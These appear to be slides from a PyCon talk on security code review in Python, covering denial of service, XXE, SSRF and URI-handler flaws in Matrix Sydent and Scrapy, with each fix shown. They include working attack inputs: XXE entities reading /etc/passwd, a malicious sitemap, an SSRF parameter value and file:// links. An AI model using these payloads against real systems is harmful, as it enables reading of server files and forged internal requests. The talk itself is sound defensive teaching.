Security Code Review in Python

Claudio Salazar

About me

🧑‍💻  Application Security Engineer @ ChartMogul

🐍  9 years developing in Python

Expertise in:

🕸  web scraping

🤺  secure software development

🕵🏼‍♂️  vulnerability research

Agenda

  1. Denial of Service
  2. XML External Entity (XXE)
  3. Server Side Request Forgery (SSRF)
  4. URI handlers

Denial of Service

General idea

# server_name is under my control
uri = b"https://%s/.well-known/matrix/server" % (server_name, )
uri_str = uri.decode("ascii")
logger.info("Fetching %s", uri_str)

try:
  response = yield self._well_known_agent.request(b"GET", uri)
  body = yield readBody(response)
  
  if response.code != 200:
    raise Exception("Non-200 response %s" % (response.code, ))

  parsed_body = json.loads(body.decode('utf-8'))
  logger.info("Response from .well-known: %s", parsed_body)

  ...

Snippet from Matrix's Sydent 2.2.0

GET /.well-known/matrix/server HTTP/1.1
Host: domain.tld

Response from my malicious server

DoS by memory consumption

uri = b"https://%s/.well-known/matrix/server" % (server_name, )
uri_str = uri.decode("ascii")
logger.info("Fetching %s", uri_str)

try:
  response = yield self._well_known_agent.request(b"GET", uri)
  body = yield readBody(response)  # buffers the whole body in memory, with no size limit

  if response.code != 200:
    raise Exception("Non-200 response %s" % (response.code, ))

  parsed_body = json.loads(
    body.decode('utf-8')
  )
  logger.info("Response from .well-known: %s", parsed_body)

  ...

Solution (Sydent 2.3.0)

uri = b"https://%s/.well-known/matrix/server" % (server_name,)
uri_str = uri.decode("ascii")
logger.info("Fetching %s", uri_str)

try:
  response = await self._well_known_agent.request(b"GET", uri)
  body = await read_body_with_max_size(response, WELL_KNOWN_MAX_SIZE)
  
  if response.code != 200:
    raise Exception("Non-200 response %s" % (response.code,))

  parsed_body = json_decoder.decode(body.decode("utf-8"))
  logger.info("Response from .well-known: %s", parsed_body)
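
The idea behind a size-capped read can be sketched with the standard library alone. This is not Sydent's read_body_with_max_size; the names read_limited, BodyTooLargeError and MAX_BODY_SIZE are hypothetical, and the cap value is an assumption chosen only for illustration.

```python
import io

# Hypothetical cap; pick a value that fits the payload you expect.
MAX_BODY_SIZE = 50 * 1024


class BodyTooLargeError(Exception):
    """Raised when a body grows past the allowed size."""


def read_limited(stream, max_size=MAX_BODY_SIZE, chunk_size=4096):
    """Read a binary stream in chunks and stop as soon as max_size is exceeded."""
    chunks = []
    total = 0
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        total += len(chunk)
        if total > max_size:
            # Give up early instead of buffering an attacker-sized body.
            raise BodyTooLargeError("body exceeds %d bytes" % max_size)
        chunks.append(chunk)
    return b"".join(chunks)


# Usage: a small, well-formed body is returned unchanged.
body = read_limited(io.BytesIO(b'{"m.server": "domain.tld:443"}'))
```

The check happens while reading, so memory use stays bounded by roughly max_size plus one chunk, whatever the server sends.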

XML External Entity (XXE)

General idea

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example "hello"> ]>
<demo>
  <demoId>&example;</demoId>
</demo>

Parsed result:

<demo>
  <demoId>hello</demoId>
</demo>

Things could go wrong

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/issue.net"> ]>
<demo>
  <demoId>&example;</demoId>
</demo>

Parsed result:

<demo>
  <demoId>Ubuntu 20.04.3 LTS
</demoId>
</demo>

from scrapy.spiders import SitemapSpider

class MySpider(SitemapSpider):
    sitemap_urls = ['http://www.example.com/sitemap.xml']

    def parse(self, response):
        ...

Snippet from Scrapy documentation

class Sitemap(object):
  
    def __init__(self, xmltext):
        xmlp = lxml.etree.XMLParser(recover=True, remove_comments=True)
        self._root = lxml.etree.fromstring(xmltext, parser=xmlp)
        ...

Under the hood (Scrapy 0.22.2, 2014)

# From the lxml.etree.XMLParser documentation (default value shown)

XMLParser(
    ...,
    resolve_entities=True,
    ...
)

<?xml version="1.0" encoding="UTF-8"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
 <sitemap>
   <loc>http://domain.tld/sitemap1.xml.gz</loc>
   <lastmod>2004-10-01T18:23:17+00:00</lastmod>
 </sitemap>
</sitemapindex>

Spider against normal sitemap

spider -> http://domain.tld/sitemap1.xml.gz

<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>

<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
  <sitemap>
    <loc>http://domain.tld/&xxe;.xml</loc>
  </sitemap>
</sitemapindex>

Malicious sitemap

spider -> http://domain.tld/root:x:0:0:root:/root:/bin/bash[...].xml

class Sitemap(object):

    def __init__(self, xmltext):
        xmlp = lxml.etree.XMLParser(
          recover=True, 
          remove_comments=True, 
          resolve_entities=False
        )
        self._root = lxml.etree.fromstring(xmltext, parser=xmlp)
        ...

Solution (pull request)
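
As a defense-in-depth complement to resolve_entities=False, untrusted XML can be rejected outright when it carries a DOCTYPE, since sitemaps have no need for one. The sketch below uses only the standard library's expat bindings. It is not part of the Scrapy fix, and the names reject_doctype and DTDForbiddenError are hypothetical.

```python
from xml.parsers import expat


class DTDForbiddenError(ValueError):
    """Raised when a document carries a DOCTYPE declaration."""


def reject_doctype(xml_bytes):
    """Scan the document with expat and fail on the first DOCTYPE seen.

    Malformed XML still raises expat.ExpatError, as usual.
    """
    parser = expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Entities can only be declared inside a DTD, so refusing the
        # DOCTYPE refuses every custom entity with it.
        raise DTDForbiddenError("DOCTYPE declarations are not allowed")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.Parse(xml_bytes, True)


# Usage: a plain sitemap index passes the check silently.
reject_doctype(
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">'
    b"<sitemap><loc>http://domain.tld/sitemap1.xml.gz</loc></sitemap>"
    b"</sitemapindex>"
)
```

Calling reject_doctype before handing the same bytes to the real parser keeps the check independent of that parser's defaults.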

Server Side Request Forgery (SSRF)

General idea

def render_POST(self, request):
  send_cors(request)

  args = get_args(request, ('matrix_server_name', 'access_token'))

  result = yield self.client.get_json(
    "matrix://%s/_matrix/federation/v1/openid/userinfo?access_token=%s" % 
    (args['matrix_server_name'], urllib.parse.quote(args['access_token']),
    ),
  )

Snippet from Matrix's Sydent 2.2.0

matrix_server_name=domain.tld/path_under_control?args_too=values_too#

def render_POST(self, request):
  send_cors(request)

  args = get_args(request, ('matrix_server_name', 'access_token'))

  result = yield self.client.get_json(
    "matrix://domain.tld/path_under_control?args_too=values_too#..."
  )

Snippet from Matrix's Sydent 2.2.0

Solution (Sydent 2.3.0)

args = get_args(request, ("matrix_server_name", "access_token"))

matrix_server = args["matrix_server_name"].lower()

if not is_valid_matrix_server_name(matrix_server):
  request.setResponseCode(400)
  return {
    "errcode": "M_INVALID_PARAM",
    "error": "matrix_server_name must be a valid Matrix server name ...",
  }

result = await self.client.get_json(
  "matrix://%s/_matrix/federation/v1/openid/userinfo?access_token=%s"
  % (
    matrix_server,
    urllib.parse.quote(args["access_token"]),
  ),
  1024 * 5,
)
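
What a server-name check has to refuse can be sketched as follows. This is not Sydent's is_valid_matrix_server_name; looks_like_server_name and its pattern are hypothetical and deliberately strict (DNS labels plus an optional port, with no IPv6 literals and no port range check).

```python
import re

# Hypothetical pattern: dot-separated DNS labels, then an optional ":port".
_LABEL = r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
_SERVER_NAME_RE = re.compile(
    r"(?:%s\.)*%s(?::[0-9]{1,5})?" % (_LABEL, _LABEL)
)


def looks_like_server_name(value):
    """Return True only for host[:port] strings with no path, query or fragment."""
    return len(value) <= 255 and _SERVER_NAME_RE.fullmatch(value) is not None


# Usage: the value is lowercased first, as in the snippet above.
ok = looks_like_server_name("Domain.TLD:8448".lower())
bad = looks_like_server_name("domain.tld/path_under_control?args_too=values_too#")
```

Using fullmatch matters here: a match anchored only at the start would accept the malicious value, because it begins with a valid hostname.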

class FederationHttpClient(HTTPClient):
  def __init__(self, sydent: "Sydent") -> None:
    self.sydent = sydent
    self.agent = MatrixFederationAgent(
      BlacklistingReactorWrapper(
        reactor=self.sydent.reactor,
        ip_whitelist=sydent.config.general.ip_whitelist,
        ip_blacklist=sydent.config.general.ip_blacklist,
      ),
      ClientTLSOptionsFactory(sydent.config.http.verify_federation_certs)
      if sydent.use_tls_for_federation
      else None,
    )

Solution (Sydent 2.3.0)
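
The kind of check an IP blacklist performs can be sketched with the standard ipaddress module. This is not the code of BlacklistingReactorWrapper; BLOCKED_NETWORKS and is_blocked_ip are hypothetical, and the list of ranges is an assumption that a real deployment would adapt.

```python
import ipaddress

# Hypothetical deny list: loopback, private and link-local ranges.
BLOCKED_NETWORKS = [
    ipaddress.ip_network(cidr)
    for cidr in (
        "127.0.0.0/8",
        "10.0.0.0/8",
        "172.16.0.0/12",
        "192.168.0.0/16",
        "169.254.0.0/16",
        "::1/128",
        "fc00::/7",
        "fe80::/10",
    )
]


def is_blocked_ip(address):
    """Return True when the address falls inside any blocked network."""
    ip = ipaddress.ip_address(address)
    # Membership tests across IP versions simply evaluate to False.
    return any(ip in network for network in BLOCKED_NETWORKS)


# Usage: a cloud metadata address is refused, a public address is not.
metadata_blocked = is_blocked_ip("169.254.169.254")
public_blocked = is_blocked_ip("93.184.216.34")
```

A check like this is only effective when applied to the address the connection actually uses, after DNS resolution, rather than to the hostname string supplied by the user.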

URI handlers

General idea

🤝 URI handlers add support for protocols such as:

  • http(s)
  • s3
  • file
  • custom protocols

A normal spider

import scrapy
from scrapy.http import Request

class ExampleSpider(scrapy.Spider):
    name = "example_spider"
    allowed_domains = ["dangerous.tld"]
    start_urls = ["http://dangerous.tld/"]

    def parse(self, response):
        next_url = response.xpath("//a/@href").extract_first()
        yield Request(next_url, self.parse_next)

<!doctype html>
<body>
  <a href="/next">click!</a>
</body>

Oops, malicious server

<!doctype html>
<body>
  <a href="file:///etc/passwd">click!</a>
</body>

In [1]: from urllib.parse import urlparse

In [2]: urlparse("file:///etc/passwd").hostname is None
Out[2]: True
  
In [3]: urlparse("file://dangerous.tld/etc/passwd").hostname
Out[3]: 'dangerous.tld'

<!doctype html>
<body>
  <a href="file://dangerous.tld/etc/passwd">click!</a>
</body>

Solution

# settings.py

...

DOWNLOAD_HANDLERS = {
    'file': None,
    'data': 'scrapy.core.downloader.handlers.datauri.DataURIDownloadHandler',
    'http': 'scrapy.core.downloader.handlers.http.HTTPDownloadHandler',
    'https': 'scrapy.core.downloader.handlers.http.HTTPDownloadHandler',
    's3': 'scrapy.core.downloader.handlers.s3.S3DownloadHandler',
    'ftp': 'scrapy.core.downloader.handlers.ftp.FTPDownloadHandler',
}
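
Besides disabling the handler, a spider can check every extracted link before requesting it. The sketch below uses only urllib.parse; safe_absolute_url and ALLOWED_SCHEMES are hypothetical names and not part of Scrapy.

```python
from urllib.parse import urljoin, urlparse

# Hypothetical allow list: only schemes the spider is meant to follow.
ALLOWED_SCHEMES = {"http", "https"}


def safe_absolute_url(base_url, href, allowed_domains):
    """Resolve href against base_url; return it only if scheme and host are expected."""
    url = urljoin(base_url, href)
    parts = urlparse(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return None  # file://, s3://, ftp:// and friends stop here
    host = parts.hostname or ""
    if not any(host == d or host.endswith("." + d) for d in allowed_domains):
        return None
    return url


# Usage: a relative link is resolved, a file:// link is dropped.
next_url = safe_absolute_url("http://dangerous.tld/", "/next", ["dangerous.tld"])
leak_url = safe_absolute_url(
    "http://dangerous.tld/", "file://dangerous.tld/etc/passwd", ["dangerous.tld"]
)
```

Checking the scheme separately from the host is the point: as the urlparse session above shows, a file:// URL can carry a hostname that satisfies a domain-only filter.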

Recommendations

  1. Limit I/O interactions to expected sizes
  2. Beware of defaults in libraries you use
  3. Consider adding defense in depth
  4. Reduce your attack surface by disabling unused features

Q & A

Thank you!

Thanks to:

  • Scrapy developers
  • Matrix security team

By csalazar

PyCon Chile/Argentina
